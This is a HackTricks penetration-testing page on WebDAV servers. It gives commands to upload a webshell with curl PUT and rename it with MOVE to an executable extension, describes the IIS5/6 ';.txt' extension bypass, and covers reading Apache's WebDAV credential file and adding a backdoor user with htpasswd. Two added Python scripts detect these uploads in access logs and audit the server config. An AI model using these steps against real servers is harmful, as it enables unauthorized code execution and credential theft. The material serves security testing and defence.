hacktricks/network-services-pentesting/pentesting-web/put-method-webdav.md
# WebDav
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
When dealing with an **HTTP server with WebDav** enabled, it is easy to **manipulate files** if you have the **right credentials**, usually verified through **HTTP Basic Authentication**. Gaining control over such a server often involves **uploading and executing a webshell**.

Access to a WebDav server typically requires **valid credentials**, with [**WebDav bruteforce**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) being a common way to obtain them.

To overcome restrictions on file uploads, especially those that prevent the execution of server-side scripts, you can:
* **Upload** files with **executable extensions** directly if they are not blocked.
* **Rename** uploaded non-executable files (such as .txt) to an executable extension.
* **Copy** uploaded non-executable files, changing their extension to an executable one.
## DavTest
**Davtest** tries to **upload several files with different extensions** and **checks** whether each extension gets **executed**:
```bash
davtest [-auth user:password] -move -sendbd auto -url http://<IP> # Upload .txt files and try to move them to other extensions
davtest [-auth user:password] -sendbd auto -url http://<IP> # Try to upload every extension
```
Output sample:
![](<../../.gitbook/assets/image (851).png>)
This does not mean that the **.txt** and **.html extensions are being executed**. It means that you can **access these files** through the web server.
## Cadaver
You can use this tool to **connect to the WebDav server** and perform actions (such as **upload**, **move** or **delete**) **manually**.
```bash
cadaver <IP>
```
## PUT request
```bash
curl -T 'shell.txt' "http://$ip/" # Uploads the local file as /shell.txt
```
## MOVE request
```bash
curl -X MOVE --header "Destination: http://$ip/shell.php" "http://$ip/shell.txt"
```
## IIS5/6 WebDav vulnerability
This vulnerability is very interesting. **WebDav** does **not allow** **uploading** or **renaming** files with the **.asp** extension. But you can **bypass** this by **appending** **";.txt"** to the end of the name, and the file will be **executed** as if it were a .asp file (you can also **use ".html" instead of ".txt"**, but **DON'T FORGET the ";"**).

Then you can **upload** your shell as a ".**txt"** file and **copy/move it** to a ".asp;.txt" file. Accessing that file through the web server will **execute** it (cadaver will say the move action did not work, but it did).
![](<../../.gitbook/assets/image (1092).png>)
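The upload-then-rename pattern from the section above and the `;.txt` trick of the IIS section leave the same trace in the web server's access log: a PUT of a harmless extension followed by a MOVE/COPY whose `Destination` ends in an executable extension. The following added example (not code from the page) is a small log reviewer that flags those requests. It assumes a log format that appends the `Destination` request header, e.g. `LogFormat "%h %t \"%r\" %>s \"%{Destination}i\"" davlog` in Apache (the stock combined format does not record it), and the sample lines are constructed.

```python
"""Flag WebDAV write requests that turn an upload into server-side code.

Added example, not from the original page. Assumes an Apache CustomLog
whose format appends the Destination header (constructed format):
    LogFormat "%h %t \"%r\" %>s \"%{Destination}i\"" davlog
"""
import re
from urllib.parse import unquote, urlsplit

# Extensions a typical web server hands to a script engine; extend for your stack.
EXEC_EXTS = {".php", ".phtml", ".asp", ".aspx", ".jsp", ".cgi", ".pl"}
WRITE_METHODS = {"PUT", "MOVE", "COPY"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) "(?P<dest>[^"]*)"$'
)

# Constructed sample log: a .txt upload moved to .php, and the IIS ";.txt" trick.
SAMPLE_LOG = """\
10.0.0.5 [12/Mar/2024:10:01:02 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 "-"
10.0.0.5 [12/Mar/2024:10:01:09 +0000] "PUT /webdav/notes.txt HTTP/1.1" 201 "-"
10.0.0.5 [12/Mar/2024:10:01:15 +0000] "MOVE /webdav/notes.txt HTTP/1.1" 201 "http://dav.example/webdav/shell.php"
10.0.0.7 [12/Mar/2024:10:02:30 +0000] "PUT /webdav/cmd.txt HTTP/1.1" 201 "-"
10.0.0.7 [12/Mar/2024:10:02:41 +0000] "MOVE /webdav/cmd.txt HTTP/1.1" 201 "http://dav.example/webdav/cmd.asp;.txt"
10.0.0.9 [12/Mar/2024:10:03:00 +0000] "GET /webdav/notes.txt HTTP/1.1" 200 "-"
"""


def effective_ext(target: str) -> str:
    """Extension the server will act on, covering the IIS 5/6 ';' behaviour.

    '/x/shell.asp;.txt' -> '.asp'   (IIS 5/6 stops parsing the name at ';')
    '/x/shell.php'      -> '.php'
    '/x/README'         -> ''
    """
    # urlsplit (not urlparse) keeps ';' in the path so we can cut it ourselves
    name = unquote(urlsplit(target).path).rsplit("/", 1)[-1]
    name = name.split(";", 1)[0]
    if "." not in name:
        return ""
    return "." + name.rsplit(".", 1)[-1].lower()


def analyse_line(line: str):
    """Return a finding dict for PUT/MOVE/COPY lines, None for anything else."""
    m = LOG_RE.match(line.strip())
    if not m or m["method"] not in WRITE_METHODS:
        return None
    method = m["method"]
    dest = m["dest"]
    # MOVE/COPY act on the Destination header; PUT acts on the request path
    target = dest if method != "PUT" and dest not in ("", "-") else m["path"]
    ext = effective_ext(target)
    if ext in EXEC_EXTS:
        severity = "high"        # a file the server may execute was created/renamed
    elif ";" in target:
        severity = "medium"      # ';' in an uploaded name is a parser-trick signal
    else:
        severity = "info"        # benign-looking write; keep for correlation
    return {"ip": m["ip"], "method": method, "target": target,
            "ext": ext, "severity": severity, "status": int(m["status"])}


def scan(lines):
    """Run analyse_line over an iterable of log lines, keeping only write requests."""
    return [f for f in map(analyse_line, lines) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:6} {f['ip']:10} {f['method']:5} {f['target']}")
```

Run over the constructed sample, the two MOVE lines come out as `high` (effective extensions `.php` and `.asp`), the two PUTs as `info`, and the PROPFIND/GET lines are ignored; grouping findings by source IP then shows the upload-rename pair the section describes.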
## Post credentials
If the Webdav was using an Apache server you should look at the sites configured in Apache. Commonly:\
_**/etc/apache2/sites-enabled/000-default**_
Inside it you can find something like:
```
ServerAdmin webmaster@localhost
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
    DAV On
    AuthType Digest
    AuthName "webdav"
    AuthUserFile /etc/apache2/users.password
    Require valid-user
</Directory>
```
As you can see, there is a file with valid **credentials** for the **webdav** server:
```
/etc/apache2/users.password
```
Inside this type of file you will find the **username** and a **hash** of the password. These are the credentials the webdav server uses to authenticate users.
You can try to **crack** them, or to **add more** if for some reason you want to **access** the **webdav** server:
```bash
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
```
To check whether the new credentials work you can do:
```bash
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
```
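The `<Directory>` block above is what makes the whole page work: `DAV On` lets authenticated users write into a directory that the same server also executes scripts from. As an added example (not code from the page or from the Apache project), the following script parses such a block and reports the settings that let an uploaded file run as code, next to a hardened variant of the same block. The checks are heuristics on a few well-known directives (`SetHandler`, `Options`, `php_admin_flag`, `AuthType`, `Require`); nested `<LimitExcept>` or `<FilesMatch>` sections are not parsed. Both configs are constructed. Note also that with `AuthType Digest` the `AuthUserFile` is in `htdigest` format (`user:realm:hash`), so a user added with `htpasswd` as shown above will only authenticate against a `Basic` vhost.

```python
"""Audit an Apache <Directory> block that enables WebDAV.

Added example, not from the page or the Apache project. The parser is
deliberately minimal (flat directives only); the two configs are constructed.
"""
import re

WEAK_CONF = """\
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
    DAV On
    AuthType Basic
    AuthName "webdav"
    AuthUserFile /etc/apache2/users.password
    Require valid-user
</Directory>
"""

HARDENED_CONF = """\
Alias /webdav /var/www/webdav
<Directory /var/www/webdav>
    DAV On
    # never hand DAV-writable files to a script engine
    SetHandler default-handler
    Options -ExecCGI -Includes
    php_admin_flag engine off
    AuthType Digest
    AuthName "webdav"
    AuthDigestProvider file
    AuthUserFile /etc/apache2/users.password
    Require valid-user
</Directory>
"""

DIR_RE = re.compile(r"<Directory\s+(?P<path>[^>]+)>(?P<body>.*?)</Directory>", re.S)


def parse_directory_blocks(conf: str) -> dict:
    """Map directory path -> {lowercased directive: [values]} for each <Directory>."""
    blocks = {}
    for m in DIR_RE.finditer(conf):
        directives = {}
        for raw in m["body"].splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            key, _, val = line.partition(" ")
            directives.setdefault(key.lower(), []).append(val.strip().strip('"'))
        blocks[m["path"].strip()] = directives
    return blocks


def audit(conf: str, tls: bool = False) -> list:
    """Return (path, severity, message) for every DAV-enabled directory."""
    findings = []
    for path, d in parse_directory_blocks(conf).items():
        if [v.lower() for v in d.get("dav", [])] != ["on"]:
            continue  # not a WebDAV directory
        handler_off = "default-handler" in [v.lower() for v in d.get("sethandler", [])]
        php_off = any(v.lower() == "engine off" for v in d.get("php_admin_flag", []))
        if not (handler_off or php_off):
            findings.append((path, "high",
                             "DAV On without disabling script handlers: uploads can run as code"))
        if "-execcgi" not in " ".join(d.get("options", [])).lower():
            findings.append((path, "medium", "ExecCGI not explicitly disabled"))
        if "require" not in d:
            findings.append((path, "high", "no Require directive: anonymous write access"))
        if d.get("authtype", [""])[0].lower() == "basic" and not tls:
            findings.append((path, "medium",
                             "Basic auth without TLS sends credentials in clear text"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for path, sev, msg in audit(conf) or [("-", "ok", "no findings")]:
            print(f"  [{sev}] {path}: {msg}")
```

On the weak block the audit reports three findings (script handlers still active, ExecCGI not disabled, Basic auth without TLS); on the hardened block it reports none. Pass `tls=True` when the vhost is only reachable over HTTPS to drop the Basic-auth finding.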
## References
* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)